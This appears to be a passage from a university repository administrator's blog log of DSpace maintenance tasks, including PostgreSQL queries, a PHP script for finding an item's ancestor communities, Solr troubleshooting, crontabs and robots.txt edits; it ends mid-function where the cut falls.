Main

February 7, 2012

Select to find ascii control characters in DSPACE (i.e. in the postgres DB)

SQL select for control characters

The command below finds DSPACE titles that contain ASCII control characters. As written, the character class starts at chr(31), so it flags codes below 31.
 select  handle, title, item.last_modified   from item, handle, itemsbytitle  where item.item_id = handle.resource_id  AND itemsbytitle.item_id = item.item_id AND last_modified > '2012-01-28'  AND title ~ ('[^'||chr(31)||'-'||chr(255)||']')  ;

Reason for the Range

The table at http://www.asciitable.com/ shows that the ASCII control characters all have codes below 32 (0 through 31), so the range in the regex should start at chr(32) to catch code 31 as well.

Result of the search

handle |                                                           title                                                            |       last_modified        
--------+----------------------------------------------------------------------------------------------------------------------------+----------------------------
 47226  | Pouvoir, violence et resistance en postcolonie : une lecture de en attendant le vote des betes Sauvages E’Ahmadou Kourouma | 2012-02-04 01:11:16.764-06
(1 row)

Converting the title to hex and sorting


[silvi003:~]$ echo 'Pouvoir, violence et resistance en postcolonie : une lecture de en attendant le vote des betes Sauvages E’Ahmadou Kourouma'
  | hexdump -v -e '"\\\x" 1/1 "%02x" " "' | perl -p -i -e 's/ /\n/g' | sort | uniq -c  
   1 \x0a
  18 \x20
   1 \x2c
   1 \x3a
   1 \x41
   1 \x45
   1 \x4b
   1 \x50
   1 \x53
   7 \x61
   1 \x62
   4 \x63
   4 \x64
  19 \x65
   1 \x67
   1 \x68
   4 \x69
   4 \x6c
   2 \x6d
   8 \x6e
  10 \x6f
   1 \x70
   4 \x72
   6 \x73
   9 \x74
   7 \x75
   4 \x76
   1 \x80
   1 \x99
   1 \xe2
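The dump shows a line feed (\x0a), and it is the last byte. Note that echo appends a newline of its own, so this \x0a may come from echo rather than from the title; printf '%s' or echo -n would rule that out. The bytes \xe2 \x80 \x99 are the UTF-8 encoding of the right single quotation mark (’, U+2019). If the database encoding is UTF-8, that character lies above chr(255) and may be what actually triggered the match.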

ISSUE

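The regex above will also select strings that contain a CR (carriage return):
binary 000 1101, octal 015, decimal 13, hex 0D, abbreviation CR, caret notation ^M, escape \r
This is bad. I need to add an exception (some sort of "OR") so that a CR is not flagged.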
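One way to express such an exception is a character class that lists the control codes explicitly and leaves out the ones to tolerate. The sketch below is in Python, not PostgreSQL, and assumes that tab, LF, and CR are the acceptable control characters; the function names are made up for illustration.

```python
import re

# Control characters are codes 0-31. Tab (9), LF (10) and CR (13) are left
# out of the class on the ASSUMPTION that they are acceptable in a title.
CONTROL_CHARS = re.compile(r"[\x00-\x08\x0b\x0c\x0e-\x1f]")


def has_control_chars(title):
    """Return True if the title contains a disallowed control character."""
    return CONTROL_CHARS.search(title) is not None


def control_char_codes(title):
    """Return the sorted, de-duplicated codes of the disallowed characters."""
    return sorted({ord(ch) for ch in CONTROL_CHARS.findall(title)})


if __name__ == "__main__":
    print(has_control_chars("title ending in CR LF\r\n"))
    print(control_char_codes("bell\x07 and unit separator\x1f"))
```

Listing the ranges explicitly avoids the negated class, so characters above 255 are never flagged by accident.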

November 18, 2011

Number of assets per item in AgEcon

File that contains a list of all bitstreams in Agecon

less transfer.sh

./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_61536/urepository_2.pdf
./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_61536/urepository_1.pdf
./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_99776/urepository_1.pdf
./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_114550/urepository_2.pdf
./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_114550/urepository_1.pdf
./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_93451/urepository_1.pdf
./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_93451/urepository_2.pdf
                                                        ^               ^
                                                        |               |
                                                    Handle            Bitstream number
[swadm:/swadm/assetstore_stage]$ cat transfer.sh  | perl -p -i -e 's/(.\/AssetsUDC\/Assets_Found201111.*asset_)(\d+)(\/urepository_)(\d+)(\.pdf)/\4/g' | sort | uniq -c | sort -nk 2 


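The command keeps only the bitstream number (\4), so each count is the number of files with that bitstream number. If bitstream numbers run consecutively from 1 within each item, this is the number of items with at least that many assets.

Number   Bitstream
of       number
files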
  48971 1
  21191 2
    116 3
     13 4
      4 5
      3 6
      2 7
      1 8
      1 9
      1 10
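The pipeline above counts how often each bitstream number occurs. To get the exact number of files per handle, one could group by the handle instead. The sketch below does that in Python on the sample paths shown earlier; the function names are illustrative, and it assumes every path ends in asset_<handle>/urepository_<n>.pdf.

```python
import re
from collections import Counter

# Captures the handle and the bitstream number from one path.
PATH_RE = re.compile(r"asset_(\d+)/urepository_(\d+)\.pdf$")


def assets_per_item(paths):
    """Map each handle to the number of bitstream files listed for it."""
    per_handle = Counter()
    for path in paths:
        match = PATH_RE.search(path.strip())
        if match:
            per_handle[match.group(1)] += 1
    return per_handle


def distribution(per_handle):
    """Map 'assets per item' to the number of items with exactly that many."""
    return Counter(per_handle.values())


SAMPLE = [
    "./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_61536/urepository_2.pdf",
    "./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_61536/urepository_1.pdf",
    "./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_99776/urepository_1.pdf",
    "./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_114550/urepository_2.pdf",
    "./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_114550/urepository_1.pdf",
    "./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_93451/urepository_1.pdf",
    "./AssetsUDC/Assets_Found20111114_1524_60427_max/asset_93451/urepository_2.pdf",
]

if __name__ == "__main__":
    for n_assets, n_items in sorted(distribution(assets_per_item(SAMPLE)).items()):
        print(n_items, n_assets)
```

For the seven sample paths this gives one item with one asset and three items with two assets.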

November 14, 2011

DSPACE mime types for AgEcon ... Very few excel

Below is a list of all the MIME types supported by DSPACE

 bitstream_format_id |           mimetype            |  short_description   |                             description                              | support_level | internal 
---------------------+-------------------------------+----------------------+----------------------------------------------------------------------+---------------+----------
                   3 | application/pdf               | PDF                  | Adobe Portable Document Format                                       |             1 | f
                   1 | application/octet-stream      | Unknown              | Unknown data format                                                  |             0 | f
                   2 | text/plain                    | License              | Item-specific license agreed upon to submission                      |             1 | t
                   4 | text/xml                      | XML                  | Extensible Markup Language                                           |             1 | f
                   5 | text/plain                    | Text                 | Plain Text                                                           |             1 | f
                   6 | text/html                     | HTML                 | Hypertext Markup Language                                            |             1 | f
                   7 | text/css                      | CSS                  | Cascading Style Sheets                                               |             1 | f
                   8 | application/msword            | Microsoft Word       | Microsoft Word                                                       |             1 | f
                   9 | application/vnd.ms-powerpoint | Microsoft Powerpoint | Microsoft Powerpoint                                                 |             1 | f
                  10 | application/vnd.ms-excel      | Microsoft Excel      | Microsoft Excel                                                      |             1 | f
                  11 | application/marc              | MARC                 | Machine-Readable Cataloging records                                  |             1 | f
                  12 | image/jpeg                    | JPEG                 | Joint Photographic Experts Group/JPEG File Interchange Format (JFIF) |             1 | f
                  13 | image/gif                     | GIF                  | Graphics Interchange Format                                          |             1 | f
                  14 | image/png                     | image/png            | Portable Network Graphics                                            |             1 | f
                  15 | image/tiff                    | TIFF                 | Tag Image File Format                                                |             1 | f
                  16 | audio/x-aiff                  | AIFF                 | Audio Interchange File Format                                        |             1 | f
                  17 | audio/basic                   | audio/basic          | Basic Audio                                                          |             1 | f
                  18 | audio/x-wav                   | WAV                  | Broadcase Wave Format                                                |             1 | f
                  19 | video/mpeg                    | MPEG                 | Moving Picture Experts Group                                         |             1 | f
                  20 | text/richtext                 | RTF                  | Rich Text Format                                                     |             1 | f
                  21 | application/vnd.visio         | Microsoft Visio      | Microsoft Visio                                                      |             1 | f
                  22 | application/x-filemaker       | FMP3                 | Filemaker Pro                                                        |             1 | f
                  23 | image/x-ms-bmp                | BMP                  | Microsoft Windows bitmap                                             |             1 | f
                  24 | application/x-photoshop       | Photoshop            | Photoshop                                                            |             1 | f
                  25 | application/postscript        | Postscript           | Postscript Files                                                     |             1 | f
                  26 | video/quicktime               | Video Quicktime      | Video Quicktime                                                      |             1 | f
                  27 | audio/x-mpeg                  | MPEG Audio           | MPEG Audio                                                           |             1 | f
                  28 | application/vnd.ms-project    | Microsoft Project    | Microsoft Project                                                    |             1 | f
                  29 | application/mathematica       | Mathematica          | Mathematica Notebook                                                 |             1 | f
                  30 | application/x-latex           | LateX                | LaTeX document                                                       |             1 | f
                  31 | application/x-tex             | TeX                  | Tex/LateX document                                                   |             1 | f
                  32 | application/x-dvi             | TeX dvi              | TeX dvi format                                                       |             1 | f
                  33 | application/sgml              | SGML                 | SGML application (RFC 1874)                                          |             1 | f
                  34 | application/wordperfect5.1    | WordPerfect          | WordPerfect 5.1 document                                             |             1 | f
                  35 | audio/x-pn-realaudio          | RealAudio            | RealAudio file                                                       |             1 | f
                  36 | image/x-photo-cd              | Photo CD             | Kodak Photo CD image                                                 |             1 | f

A file with the wrong bitstream_format_id

 
handle | bitstream_id | bitstream_format_id |                    name                     | size_bytes |             checksum             | checksum_algorithm | description | user_format_description |                                     source                                      |               internal_id               | deleted | store_number | sequence_id 
--------+--------------+---------------------+---------------------------------------------+------------+----------------------------------+--------------------+-------------+-------------------------+---------------------------------------------------------------------------------+-----------------------------------------+---------+--------------+-------------
 95522  |        74367 |                   1 | Staff Paper P10-8--InSTePP10-04.revised pdf |     313884 | 35f4304e6a0c68e935c09c0469a9e291 | MD5                |             |                         | /dspace/assetstore/dspace-sr/upload/Staff Paper P10-8--InSTePP10-04.revised pdf | 102028865626877833459313413758816463357 | f       |            0 |           2
(1 row)

This is labeled as Unknown, but should be PDF. The line below changed it:
 
dspace_sr=> 
dspace_sr=> UPDATE bitstream SET bitstream_format_id = '3' WHERE bitstream_id = '74367';
UPDATE 1

Distribution of bitstream_format_id

The sql query that pulls only live bitstreams:
[silvi003:~]$ cat cmdMime.sql 
\f ','
\a
\t
\o outputfile.csv
SELECT bitstream_format_id  FROM handle,item, item2bundle,bitstream,bundle2bitstream WHERE  handle.resource_type_id=2 AND handle.resource_id = item2bundle.item_id AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND handle.resource_id=item.item_id AND item.withdrawn='f' AND   bundle2bitstream.bitstream_id = bitstream.bitstream_id AND  bitstream.deleted = 'f'  ;
\o
\q
[silvi003:~]$ psql -U dspace_sr  dspace_sr  < cmdMime.sql
Count of each bitstream_format_id

[silvi003:~]$ cat outputfile.csv | sort | uniq -c | sort -n 
      # bitstream_format_id
      1 1
      2 10
  20602 2
  48265 3

The odd bitstream_format_id values

Most of the bitstreams are PDFs (bitstream_format_id 3) or licenses (bitstream_format_id 2). There is one Unknown (bitstream_format_id 1) and two Excel (bitstream_format_id 10). They are shown below:
bitstream_format_id =1
dspace_sr=> SELECT handle, bitstream.*  FROM handle,item2bundle,bitstream,bundle2bitstream WHERE  handle.resource_type_id=2 AND handle.resource_id = item2bundle.item_id AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND handle.resource_id=item.item_id AND item.withdrawn='f' AND   bundle2bitstream.bitstream_id = bitstream.bitstream_id AND  bitstream.deleted = 'f'  AND bitstream_format_id=1;
NOTICE:  adding missing FROM-clause entry for table "item"
 handle | bitstream_id | bitstream_format_id |                          name                           | size_bytes |             checksum             | checksum_algorithm | description | user_format_description |                                           source                                            |              internal_id               | deleted | store_number | sequence_id 
--------+--------------+---------------------+---------------------------------------------------------+------------+----------------------------------+--------------------+-------------+-------------------------+---------------------------------------------------------------------------------------------+----------------------------------------+---------+--------------+-------------
 62242  |        59248 |                   1 | data appendix jayasinghe Beghin Moschini ajae 9007.xlsx |     141434 | 6f40baf7dd97f784091e69ed8714b837 | MD5                |             |                         | /dspace/assetstore/dspace-sr/upload/data appendix jayasinghe Beghin Moschini ajae 9007.xlsx | 13124464764865665476393448862247227640 | f       |            0 |           3
(1 row)


bitstream_format_id =10
dspace_sr=> SELECT handle, bitstream.*  FROM handle,item2bundle,bitstream,bundle2bitstream WHERE  handle.resource_type_id=2 AND handle.resource_id = item2bundle.item_id AND item2bundle.bundle_id=bundle2bitstream.bundle_id AND handle.resource_id=item.item_id AND item.withdrawn='f' AND   bundle2bitstream.bitstream_id = bitstream.bitstream_id AND  bitstream.deleted = 'f'  AND bitstream_format_id=10;
NOTICE:  adding missing FROM-clause entry for table "item"
 handle | bitstream_id | bitstream_format_id |                  name                   | size_bytes |             checksum             | checksum_algorithm |        description         | user_format_description |                                                         source                                                          |              internal_id               | deleted | store_number | sequence_id 
--------+--------------+---------------------+-----------------------------------------+------------+----------------------------------+--------------------+----------------------------+-------------------------+-------------------------------------------------------------------------------------------------------------------------+----------------------------------------+---------+--------------+-------------
 42187  |        32967 |                  10 | MissouriUseValueCalculationsOct2007.xls |     361472 | cbefd6d4008ba5d97db49d2b9178f89f | MD5                | Excel Spreadsheet          |                         | /dspace/assetstore/dspace-sr/upload/C:\Documents and Settings\Lori\My Documents\MissouriUseValueCalculationsOct2007.xls | 87756269209817911914027269532862968326 | f       |            0 |           3
 92231  |        61062 |                  10 | stpap536.data.zip                       |     741798 | b48a9d5aa21f3d8411230bde4651e4fe | MD5                | Data in zipped Excel files |                         | /dspace/assetstore/dspace-sr/upload/stpap536.data.zip                                                                   | 28095595994115196972466977473167819715 | f       |            0 |           3
(2 rows)


October 21, 2011

Finding all the collections a DSPACE item belongs to

Multi-level tree in AgEcon

The list below gives an item that is under several layers in the DSPACE tree.
AgEcon Search
  Universitaet Hohenheim>
   Institute of Agricultural Policy and Agricultural Markets >
      Working Papers >
        A 2004 Social Accounting Matrix for Israel>

SQL to determine names of ancestors of an item

Item to collection

Starting handle = 110156

SQL for item handle to collection handle

SELECT handle FROM handle WHERE resource_type_id=3 AND resource_id=(SELECT collection.collection_id FROM collection, collection2item, item, handle WHERE collection2item.item_id=item.item_id AND collection2item.collection_id=collection.collection_id AND handle.resource_id=item.item_id AND resource_type_id=2 AND handle = 110156) ;
collection handle: 93692

Collection Name SQL

select name from handle, collection where handle = 93692 AND resource_type_id= 3 AND collection_id = handle.resource_id;

Collection to Community

SQL for Collection handle to Community handle

SELECT handle FROM community2collection, handle WHERE handle.resource_type_id =4 AND community2collection.community_id = handle.resource_id AND community2collection.collection_id = (SELECT resource_id FROM handle WHERE resource_type_id= 3 AND handle= 93692);
community level 1: 93691

community name SQL

select name from handle, community where handle = 93691 AND resource_type_id= 4 AND community_id = handle.resource_id;

Next Community level

SELECT handle FROM community2community, handle WHERE handle.resource_type_id =4 AND community2community.parent_comm_id = handle.resource_id AND community2community.child_comm_id = (SELECT resource_id FROM handle WHERE resource_type_id= 4 AND handle= 93691);
top 93690

Proof that 93690 is top

SELECT handle FROM community2community, handle WHERE handle.resource_type_id =4 AND community2community.parent_comm_id = handle.resource_id AND community2community.child_comm_id = (SELECT resource_id FROM handle WHERE resource_type_id= 4 AND handle= 93690);
returns nothing
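The step-by-step climb above could also be written as one recursive query, assuming the database supports WITH RECURSIVE. The sketch below tries the idea in Python against an in-memory SQLite stand-in, not the real PostgreSQL database. The table and column names follow the queries above, the handles are the ones used above, and the internal ids (1, 10, 20, 21) are invented for the demo.

```python
import sqlite3


def build_demo_db():
    """In-memory stand-in for the DSPACE tables used above (ids are invented)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE handle (handle INTEGER, resource_type_id INTEGER, resource_id INTEGER);
        CREATE TABLE community (community_id INTEGER, name TEXT);
        CREATE TABLE collection2item (collection_id INTEGER, item_id INTEGER);
        CREATE TABLE community2collection (community_id INTEGER, collection_id INTEGER);
        CREATE TABLE community2community (parent_comm_id INTEGER, child_comm_id INTEGER);
        INSERT INTO handle VALUES (110156, 2, 1);
        INSERT INTO handle VALUES (93692, 3, 10);
        INSERT INTO handle VALUES (93691, 4, 20);
        INSERT INTO handle VALUES (93690, 4, 21);
        INSERT INTO community VALUES (20, 'Institute of Agricultural Policy and Agricultural Markets');
        INSERT INTO community VALUES (21, 'Universitaet Hohenheim');
        INSERT INTO collection2item VALUES (10, 1);
        INSERT INTO community2collection VALUES (20, 10);
        INSERT INTO community2community VALUES (21, 20);
    """)
    return db


# Seed rows: communities that directly hold the item's collection(s).
# Recursive rows: the parent of each community found so far.
ANCESTORS_SQL = """
WITH RECURSIVE up(community_id, depth) AS (
    SELECT c2c.community_id, 1
    FROM handle h
    JOIN collection2item c2i ON c2i.item_id = h.resource_id
    JOIN community2collection c2c ON c2c.collection_id = c2i.collection_id
    WHERE h.resource_type_id = 2 AND h.handle = ?
  UNION ALL
    SELECT cc.parent_comm_id, up.depth + 1
    FROM community2community cc
    JOIN up ON cc.child_comm_id = up.community_id
)
SELECT community.name, up.depth
FROM up JOIN community ON community.community_id = up.community_id
ORDER BY up.depth
"""


def community_ancestors(db, item_handle):
    """Return (community name, depth) pairs, nearest community first."""
    return db.execute(ANCESTORS_SQL, (item_handle,)).fetchall()


if __name__ == "__main__":
    for name, depth in community_ancestors(build_demo_db(), 110156):
        print(depth, name)
```

The community with the largest depth is the top of the tree, which replaces the separate "returns nothing" check.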

PHP code

The code below will pull the names of all the ancestors of an item.
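#!/usr/bin/php
<?php
// NOTE: the opening lines of this script were lost from the post. The call
// below is reconstructed from the starting handle and the expected output.
$ancestors = array();
ancestor_names(110156, $ancestors);
foreach ($ancestors as $key => $value)
 echo $key.'=>'.$value."\n";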

//
// Test should produce: (1 indicates a primary community, 0 is a lower level)
//
// Content-type: text/html
// X-Powered-By: PHP/4.3.9
// 
// Working Papers=>0
// Universitaet Hohenheim=>1
// Institute of Agricultural Policy and Agricultural Markets=>0


// if you are interested in the parents of a collection call:
// process_collection 

// if you are interested in the parents of a community call:
// process_community 


function ancestor_names($item_handle, &$ancestors){
  include("port_DSPACE_sql.inc.php");
  $dbh = open_DSPACE_DB();  // opens a connection to the DSPACE psql database

// This query will find a collection handle given an item handle
  $item_to_collection_query="SELECT handle FROM handle WHERE resource_type_id=3 AND 
          resource_id=(SELECT collection.collection_id 
          FROM collection, collection2item, item, handle 
          WHERE collection2item.item_id=item.item_id 
          AND collection2item.collection_id=collection.collection_id 
          AND handle.resource_id=item.item_id AND resource_type_id=2 
          AND handle = $item_handle) ; ";

  $result = pg_query($item_to_collection_query);
  if (!$result) {
    echo "Problem with query " . $item_to_collection_query . "\n";
    echo pg_last_error();
    exit();
  }


// Could have multiple collection parents
while ($collection_handle = pg_fetch_row($result)) {
     process_collection($collection_handle[0], $ancestors);
}
}
 
 function process_collection($collection_handle,  &$ancestors){
 // use the handle passed in (the original had 93692 hard-coded here)
 $collection_title_query = "select name from handle, collection where handle = $collection_handle AND resource_type_id= 3 AND collection_id = handle.resource_id;";
  $result = pg_query($collection_title_query);
  if (!$result) {
    echo "Problem with query " . $collection_title_query . "\n";
    echo pg_last_error();
    exit();
  }

while ($collection_title = pg_fetch_row($result)) {
  $ancestors[$collection_title[0]] = 0;
}
   collection_to_community ($collection_handle, $ancestors);
 }

// climbs the tree from the collection to the community level
function collection_to_community ($collection_handle,  &$ancestors) {
  $collection_to_commuity_query="SELECT handle FROM community2collection, handle 
                                WHERE handle.resource_type_id =4 AND 
                                community2collection.community_id = handle.resource_id AND
                                community2collection.collection_id = 
                                (SELECT resource_id FROM handle WHERE 
                                resource_type_id= 3 AND handle= $collection_handle);";
  $result = pg_query($collection_to_commuity_query);
  if (!$result) {
    echo "Problem with query " . $collection_to_commuity_query . "\n";
    echo pg_last_error();
    exit();
  }

while ($community_handle = pg_fetch_row($result)) {
     process_community($community_handle[0],$ancestors);
}

}


// finds the community title and recursively finds all higher level communities
function process_community ($community_handle, &$ancestors) {
 $community_title_query = "select name from handle, community where handle = $community_handle AND resource_type_id= 4 AND community_id = handle.resource_id; ";
 
  $result = pg_query($community_title_query);
  if (!$result) {
    echo "Problem with query " . $community_title_query . "\n";
    echo pg_last_error();
    exit();
  }
$community_title="";
while ($row = pg_fetch_row($result)) {
  $community_title = $row[0] ;
}

  $community_to_community_query="SELECT handle FROM community2community, handle WHERE 
                                handle.resource_type_id =4 AND 
                                community2community.parent_comm_id = handle.resource_id AND 
                                community2community.child_comm_id = (SELECT resource_id 
                                FROM handle WHERE resource_type_id= 4 AND handle= $community_handle); ";
  $result = pg_query($community_to_community_query);
  if (!$result) {
    echo "Problem with query " . $community_to_community_query . "\n";
    echo pg_last_error();
    exit();
  }
$this_community_is_top = 1;
while ($row = pg_fetch_row($result)) {
  // if we get into this loop there is a higher community
  $this_community_is_top = 0;
  process_community($row[0],$ancestors );
}
  $ancestors[$community_title] = $this_community_is_top;
}
 ?>

Every item maps to a collection

Number of item handles:
dspace_sr=> select count (handle) from handle where resource_type_id=2;
 count 
-------
 48653
Number of item links to collections:
dspace_sr=> select count (item_id) from collection2item;
 count 
-------
 48653

Communities do not have multiple parents

I also checked the community2community table and there were no duplicate child_comm_id values. This implies that the children have one and only one parent.
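A duplicate check of this kind can be expressed as a GROUP BY with a HAVING clause. The sketch below shows the idea in Python against an in-memory SQLite table; the column names follow community2community as used above, and the rows are invented for the demo.

```python
import sqlite3


def children_with_multiple_parents(db):
    """Return (child_comm_id, parent count) for children listed more than once."""
    rows = db.execute(
        "SELECT child_comm_id, COUNT(*) FROM community2community "
        "GROUP BY child_comm_id HAVING COUNT(*) > 1 "
        "ORDER BY child_comm_id"
    )
    return rows.fetchall()


def demo_db():
    """Small invented table: parent 21 has the children 20 and 22."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE community2community (parent_comm_id INTEGER, child_comm_id INTEGER)"
    )
    db.executemany(
        "INSERT INTO community2community VALUES (?, ?)", [(21, 20), (21, 22)]
    )
    return db


if __name__ == "__main__":
    # An empty list means every child has exactly one parent.
    print(children_with_multiple_parents(demo_db()))
```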

September 29, 2011

Reason why Islandora could not connect to SOLR on stage

The bug

When we tried to connect to solr from islandora we got the error:
Unable to connect to Solr server 

Islandora code connected to the problem

This error is generated in the Islandora file:
./sites/all/modules/Islandora-islandora_solr_search-9e474f7/solr.admin.inc
The following function is the root cause of the problem:

/**
 *
 * @param String $solr_url
 * @return boolean
 *
 * Checks availability of Solr installation
 *
 */
function solr_available($solr_url) {
  // path from url is parsed to allow graceful inclusion or exclusion of 'http://'
  $pathParts = parse_url($solr_url); 
  $path = 'http://' . $pathParts['host'] . ':' . $pathParts['port'] . $pathParts['path'] . '/admin/file';
  $test = @fopen($path, "r");
  if ($test) {
    return true;
  }
  return false;
}
    

The fix (upgrade SOLR)

It turns out that Solr 3.1 cannot recognize "/admin/file" at the end of a URL. We upgraded to Solr 3.4 and it worked.
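To see which URL the Islandora check actually requests, the same construction can be reproduced outside Drupal. The sketch below is a Python rendering of the PHP function above, not Islandora code. The URL http://localhost:8080/solr is a placeholder, and the sketch assumes the configured URL contains an explicit port.

```python
from urllib.parse import urlsplit
from urllib.request import urlopen


def solr_probe_url(solr_url):
    """Build the URL that the availability check requests."""
    parts = urlsplit(solr_url)
    return "http://{}:{}{}/admin/file".format(parts.hostname, parts.port, parts.path)


def solr_available(solr_url, timeout=5):
    """Return True if the probe URL can be opened, False otherwise."""
    try:
        with urlopen(solr_probe_url(solr_url), timeout=timeout):
            return True
    except OSError:
        # URLError and HTTPError are both subclasses of OSError.
        return False


if __name__ == "__main__":
    # Placeholder URL; substitute the Solr URL configured in Islandora.
    print(solr_probe_url("http://localhost:8080/solr"))
```

Requesting the printed URL by hand (for example in a browser) shows whether the server answers on that path.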

September 23, 2011

Switch in UDC Media filter.

I changed the Media Filter so that it would not use the unix nice command when it launches. This should speed up the process.

Crontab

@reboot /sbin/service httpd start
@reboot sudo -u tomcat /dspace/bin/start_tomcat.sh
# day of week (0 - 6) (Sunday=0)
10 1 * * 6 /dspace/dspace-ir/bin/media_launch.sh
30 22 * * 1 /dspace/dspace-sr/bin/index-all-cron
30 22 * * 2 /dspace/dspace-ir/bin/index-all-cron
30 22 * * 3 /dspace/dspace-sr/bin/index-all-cron
30 22 * * 4 /dspace/dspace-ir/bin/index-all-cron
30 22 * * 5 /dspace/dspace-sr/bin/index-all-cron

media_launch.sh

tstamp=`date "+%Y%m%d_%H:%M"`
echo $tstamp
nice /dspace/dspace-ir/bin/filter-media.sh > /dspace/dspace-ir/log/filter-media.sh_$tstamp.log 2>&1
cd /dspace/dspace-ir/bin/
/dspace/dspace-ir/bin/index_check_and_email.sh

filter-media.sh

Note that the "-n" passed to filter-media means that the index is not rebuilt after each collection is OCRed. The runs that used "nice" also used "-n".
#!/bin/sh
# This script grabs the handles of each collection
# in a DSpace DB instance. Then loops through the
# handles and run the full-text indexer against each
# collection.
# This is done to fix out of memory errors,
# PDFs that are too large for full-text indexing,
# and when filter-media (java app) fails now full
# text indexing continues on other collections.

# Setup the environment
JAVA_HOME=/opt/jdk1.5.0_10
PATH=$JAVA_HOME/bin:/opt/ant/bin:/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin
export PATH JAVA_HOME

dbname="dspace_ir"
username="read_only"
hostname="strip3.oit.umn.edu"

# Determine if we have Postgres client installed
which psql > /dev/null
if [ $? -ne 0 ]
then
  echo
  echo "psql not found in your PATH, please add to your PATH and re-run script"
  echo
  exit 1
fi

print_usage() {
  echo 1>&2 "Usage: $0 [-d dbname] [-n hostname] [-u username]"
  exit 1;
}

# "n:" added to the option string; the original "d:hu:" made the n) branch unreachable
while getopts d:hn:u: o
do
  case "$o" in
    d) dbname="$OPTARG";;
    h) print_usage;;
    n) hostname="$OPTARG";;
    u) username="$OPTARG";;
    [?]) print_usage;;
  esac
done

echo_cmd="echo SELECT handle FROM handle WHERE resource_type_id=3;"
psql_cmd="psql -t -U $username -h $hostname $dbname"

BINDIR=`dirname $0`
for handle in `$echo_cmd | $psql_cmd`
do
  $BINDIR/filter-media -n -i $handle
done

$BINDIR/index-all

September 15, 2011

Items in DSPACE with in_archive = f and withdrawn = f

Problem

Louise told me that the following two purls produced an error when accessed:
http://purl.umn.edu/114817
http://purl.umn.edu/113790

The cause

It turns out that both in_archive and withdrawn are set to false.
dspace_sr=> select * from handle where handle = 113790;
 handle_id | handle | resource_type_id | resource_id 
-----------+--------+------------------+-------------
     51427 | 113790 |                2 |       53352


dspace_sr=> select * from item where item_id = 53352;

 item_id | submitter_id | in_archive | withdrawn |       last_modified        | owning_collection 
---------+--------------+------------+-----------+----------------------------+-------------------
   53352 |         2680 | f          | f         | 2011-08-25 12:58:34.912-05 |                  
(1 row)
I think that these two flags should not both be set to f.

The solution

Set withdrawn to t, and then Louise can resubmit the metadata:
UPDATE item SET withdrawn = 'T' WHERE item_id = 53352;
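To look for other items in the same state, a query on the two flags should be enough. The sketch below runs it in Python against an in-memory SQLite stand-in for the item table. Only item 53352 comes from the output above; the other rows are invented. Items still in submission or workflow may legitimately show up in such a list, so each hit needs checking before it is changed.

```python
import sqlite3

# Same condition as the problem item: neither archived nor withdrawn.
BOTH_FALSE_SQL = (
    "SELECT item_id FROM item "
    "WHERE in_archive = 'f' AND withdrawn = 'f' "
    "ORDER BY item_id"
)


def items_with_both_flags_false(db):
    """Return the item_ids that are neither archived nor withdrawn."""
    return [row[0] for row in db.execute(BOTH_FALSE_SQL)]


def demo_db():
    """Stand-in item table; the flags are stored as 't'/'f' text for the demo."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE item (item_id INTEGER, in_archive TEXT, withdrawn TEXT)")
    db.executemany(
        "INSERT INTO item VALUES (?, ?, ?)",
        [
            (53352, "f", "f"),  # the problem item from above
            (1, "t", "f"),      # invented: a normal live item
            (2, "f", "t"),      # invented: a withdrawn item
        ],
    )
    return db


if __name__ == "__main__":
    print(items_with_both_flags_false(demo_db()))
```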

June 10, 2011

crons on strip3 (DB side of DSPACE)

# Clean up the databases nightly
20 0 * * * vacuumdb -U dspace_ir --analyze dspace_ir > /dev/null 2>&1
40 0 * * * vacuumdb -U dspace_sr --analyze dspace_sr > /dev/null 2>&1

# Backup the databases nightly
2 1 * * * /var/lib/pgsql/backup.sh

# MySQL backup
5 0 * * * /opt/mysql/bin/backup.sh

crawler not working for UDC

Problem

For conservancy.umn.edu we have not been getting good crawls from the University crawl app.

New robots.txt file

I changed the robots.txt file to allow crawling down the subject browse tree:
# removed Disallow: /browse-subject line
User-agent: *
Disallow: /browse-author
Disallow: /browse-title
Disallow: /browse-date
Disallow: /suggest
Disallow: /*/browse-subject
Disallow: /*/browse-author
Disallow: /*/browse-title
Disallow: /*/browse-date
Disallow: /image
Disallow: /feed
Disallow: /password-login
Disallow: /advanced-search

Results with new robots.txt file

I then asked Curt Squires to crawl UDC again. He found:
A test search on inurl:conservancy.umn.edu shows about 8100 hits, so I think we're still missing some stuff. http://google.umn.edu/search?q=inurl%3Aconservancy.umn.edu&btnG=Google+Search&access=p&client=default_frontend&output=xml_no_dtd&proxystylesheet=default_frontend&ie=UTF-8&entqr=0&oe=UTF-8&ud=1&site=entire_index

Future plans

Curt is out of town until next Wed. When he gets back, I will allow the robots to go down the browse title path. Since all of the assets have to have titles, that path should get everything. The new robots.txt file will be:
# Remove the lines:
# Disallow: /browse-title
# Disallow: /*/browse-title

User-agent: *
Disallow: /browse-subject
Disallow: /browse-author
Disallow: /browse-date
Disallow: /suggest
Disallow: /*/browse-subject
Disallow: /*/browse-author
Disallow: /*/browse-date
Disallow: /image
Disallow: /feed
Disallow: /password-login
Disallow: /advanced-search
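Before asking for another crawl, the planned rules can be checked locally. The sketch below uses Python's standard urllib.robotparser, which is not the University crawler and may interpret rules differently. The /*/ wildcard lines are left out because, to my knowledge, that parser treats them as literal paths.

```python
from urllib.robotparser import RobotFileParser

# The planned file from above, without the /*/ wildcard lines.
PLANNED_ROBOTS = """\
User-agent: *
Disallow: /browse-subject
Disallow: /browse-author
Disallow: /browse-date
Disallow: /suggest
Disallow: /image
Disallow: /feed
Disallow: /password-login
Disallow: /advanced-search
"""


def allowed(robots_text, path, agent="*"):
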